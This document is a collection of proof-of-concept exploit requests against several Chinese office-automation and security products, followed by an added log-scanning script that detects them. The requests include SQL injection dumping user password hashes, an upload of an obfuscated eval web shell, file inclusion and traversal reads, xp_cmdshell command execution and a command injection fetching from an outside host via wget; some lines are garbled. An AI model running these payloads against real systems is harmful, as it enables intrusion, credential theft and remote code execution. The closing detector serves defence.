Glodon (广联达) OA SQL injection vulnerability PoC
POST /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1
Host: xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx.com:8888/Services/Identification/Server/Incompatible.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --
Glodon (广联达) OA back-end file upload vulnerability PoC
POST /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1
Host: 10.10.10.1:8888
X-Requested-With: Ext.basex
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: zh-Hans-CN,zh-Hans;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj
Accept: */*
Origin: http://10.10.10.1
Referer: http://10.10.10.1:8888/Workflow/Workflow.aspx?configID=774d99d7-02bf-42ec-9e27-caeaa699f512&menuitemid=120743&frame=1&modulecode=GTP.Workflow.TaskCenterModule&tabID=40
Cookie: 
Connection: close
Content-Length: 421
------WebKitFormBoundaryFfJZ4PlAZBixjELj
Content-Disposition: form-data; filename="1.aspx";filename="1.jpg"
Content-Type: application/text
<%@ Page Language="Jscript" Debug=true%>
<%
var FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';
var GFMA=Request.Form("qmq1");
var ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);
eval(GFMA, ONOQ);
%>
------WebKitFormBoundaryFfJZ4PlAZBixjELj--
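Tongda OA (CVE-2023-4166)
Description and affected versions
Tongda OA is collaborative office-automation software developed in-house by Beijing Tongda Xinke Technology Co., Ltd. (北京通达信科科技有限公司); it is an integrated management and office platform suited to users in every industry.
Affected in this case: Tongda OA versions before 11.10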
GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 192.168.232.137:8098
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admin; OA_USER_ID=admin; SID_1=779f3f46
Upgrade-Insecure-Requests: 1
Weaver (泛微) E-Office9 front-end file inclusion
http://URL/E-mobile/App/Init.php?weiApi=1&sessionkey=ee651bec023d0db0c233fcb562ec7673_admin&m=12344554_../../attachment/xxx.xls
Landray (蓝凌) OA front-end code execution
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host:www.ynjd.cn:801
User-Agent:Mozilla/4.0 (compatible;MSIE 8.0;Windows NT 6.1)
Accept:
Connection:Keep-Alive
Content-Length:42
Content-Type:application/x-www-form-urlencoded
var={"body":{"file":"file:///etc/passwd"}}
SQL injection in a certain Weaver (泛微) version
POST /dwr/call/plaincall/CptDwrutil.ifNewsCheckoutByCurrentUser.dwr HTTP/1.1
Host:ip:port
User-Agent:Mozilla/5.0 (Windows NT 5.1)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/35.0.2117.157 Safari/537.36
Connection:close
Content-Length:189
Content-Type:text/plain
Accept-Encoding:gzip
callCount=1
page=
httpSessionId=
scriptSessionId=
c0-scriptName=DocDwrutil
c0-methodName=ifNewscheckoutByCurrentUser
c0-id=0
c0-param0=string:1 AND 1=1
c0-param1=string:1
batchId=0
Jinher (金和) OA c7-getsqldata.aspx SQL injection
POST /C6/Control/GetSqlData.aspx/.ashx
Host:ip:port
User-Agent:Mozilla/5.0 (Windows NT 5.1)AppleWebKit/537.36 (KHTML,like Gecko)Chrome/35.0.2117.157 Safari/537.36
Connection:close
Content-Length:189
Content-Type:text/plain
Accept-Encoding:gzip
exec master.xp_cmdshell 'ipconfig'
NSFOCUS (绿盟) SAS switch EXEC remote command execution vulnerability
GET /webconf/Exec/index?cmd=wget%20xxx.xxx.xxx HTTP/1.1
H0st:1.1.1.1
User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3 Safari/605.1.15
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip,deflate
Connection:close
NSFOCUS (绿盟) SAS switch GetFile arbitrary file read vulnerability PoC
GET /api/virtual/home/status?
cat=../../../../../../../../../../../../../../usr/ocal/nsfocus/w
eb/apache2/www/Local_user.php&method=login&user_account=admin
HTTP/1.1
H0st:1.1.1.1
User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3 Safari/605.1.15
Content-Type:application/x-www-form-urlencoded
Accept-Encoding:gzip,deflate
Connection:close
local_user.php arbitrary user login vulnerability PoC
GET /api/virtual/home/status?
cat=../.././../././.././../.././.././../usr/几ocal/nsfocus/w
eb/apache2/www/local_user.php&method=login&user_account=admin
HTTP/1.1
H0st:1.1.1.1
User-Agent:Mozilla/5.0 (Macintosh;Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko)Version/12.0.3 Safari/605.1.15
Accept-Encoding:gzip,deflate
Connection:close            
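
A defender-side check for the requests listed on this page, as an added example that is not part of the original post: it scans web access logs for the endpoints above and, where the page shows a query-string payload, for the parameter abuse as well. It assumes combined-log-style lines and that a legitimate `DELETE_STR` holds only digits and commas; the rule labels and sample log lines are constructed.

```python
import re
from urllib.parse import unquote, urlsplit

TRAVERSAL = r"\.\.[/\\]"
# (label, path regex, regex the decoded query must also match; None = any request)
RULES = [
    ("Glodon OA GetIMDictionary", r"/ConfigService\.asmx/GetIMDictionary", None),
    ("Glodon OA msgbroadcastuploadfile", r"/group/msgbroadcastuploadfile\.aspx", None),
    # Assumption: a legitimate DELETE_STR holds only digits and commas.
    ("Tongda OA delete_log.php", r"/dianju/delete_log\.php", r"DELETE_STR=[^&]*[^0-9,&]"),
    ("Weaver E-Office9 Init.php", r"/E-mobile/App/Init\.php", TRAVERSAL),
    ("Landray OA custom.jsp", r"/sys/ui/extend/varkind/custom\.jsp", None),
    ("Weaver DWR CptDwrutil", r"/dwr/call/plaincall/CptDwrutil\.", None),
    ("Jinher OA GetSqlData.aspx", r"/C6/Control/GetSqlData\.aspx", None),
    ("NSFOCUS SAS webconf Exec", r"/webconf/Exec/index", r"(^|&)cmd="),
    ("NSFOCUS SAS home/status", r"/api/virtual/home/status", TRAVERSAL),
]
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def fully_unquote(s, rounds=3):
    """Strip up to `rounds` layers of percent-encoding (catches %252e%252e%252f)."""
    for _ in range(rounds):
        s = unquote(s)
    return s

def scan(lines):
    """Return [(line_number, rule_label)] for each log line that matches a rule."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        path, query = fully_unquote(url.path), fully_unquote(url.query)
        for label, path_re, query_re in RULES:
            # Paths are compared case-insensitively (IIS-hosted products ignore case).
            if re.search(path_re, path, re.I) and (
                    query_re is None or re.search(query_re, query, re.I)):
                hits.append((n, label))
    return hits

# Constructed sample access-log lines (not from a real server).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0800] "GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=12,13 HTTP/1.1" 200 20',
    '198.51.100.9 - - [01/Jan/2024:10:00:05 +0800] "GET /general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20and%20(1)=(1 HTTP/1.1" 200 20',
    '198.51.100.9 - - [01/Jan/2024:10:00:09 +0800] "GET /E-mobile/App/Init.php?weiApi=1&m=1_%252e%252e%252fattachment%252fx.xls HTTP/1.1" 200 99',
    '198.51.100.7 - - [01/Jan/2024:10:00:12 +0800] "GET /api/virtual/home/status?cat=home HTTP/1.1" 200 31',
    '198.51.100.9 - - [01/Jan/2024:10:00:15 +0800] "POST /c6/control/getsqldata.aspx/.ashx HTTP/1.1" 200 740',
]
```

Rules with no query pattern fire on any request to the endpoint, because the payload in those cases travels in the POST body, which access logs do not record; treat those hits as prompts to review, not confirmed exploitation.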
        